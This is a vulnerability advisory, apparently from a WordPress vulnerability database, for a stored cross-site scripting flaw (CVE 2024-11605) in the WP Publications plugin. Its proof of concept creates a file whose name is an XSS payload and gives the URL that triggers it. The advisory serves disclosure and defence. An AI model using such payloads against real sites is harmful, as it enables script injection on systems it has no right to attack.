WP Publications <= 1.2 – Admin+ Stored XSS | CVE 2024-11605 | Plugin Vulnerabilities

Description

The plugin does not escape filenames before outputting them back in the page, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

Proof of Concept

1. On the web server, run the command `touch "<img src=x onerror=alert('XSS')>.bib"
` in the plugin directory.
2. Access the URL: https://example.com/wp-content/plugins/wp-publications/bibtexbrowser.php?frameset&bib=
3. The XSS alert will be triggered.

Affects Plugins

wp-publications

No known fix

References

CVE

URL

https://github.com/monperrus/wp-publications/issues/4

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Zeynalxan Quliyev, Revan Poladlı

Submitter

Zeynalxan Quliyev, Revan Poladlı

Verified

Yes

WPVDB ID

91c5ee70-2ff5-46cd-a0f5-54987fc2e060

Timeline

Publicly Published

2024-12-06 (about 1 year ago)

Added

2024-12-06 (about 1 year ago)

Last Updated

2024-12-06 (about 1 year ago)

Other

Published

Title

Published

2024-03-18

Title

MJM Clinic < 1.1.23 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2022-06-13

Title

WP Contact Slider < 2.4.7 - Editor+ Stored Cross-Site Scripting

Published

2024-05-03

Title

BuddyPress < 12.4.1 - Authenticated (Subscriber+) Stored Cross-Site Scripting

Published

2024-05-24

Title

Primary Addon for Elementor < 1.5.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via Pricing Table Widget

Published

2024-10-15

Title

Appointment Booking Calendar < 1.6.7.55 - Admin+ Stored XSS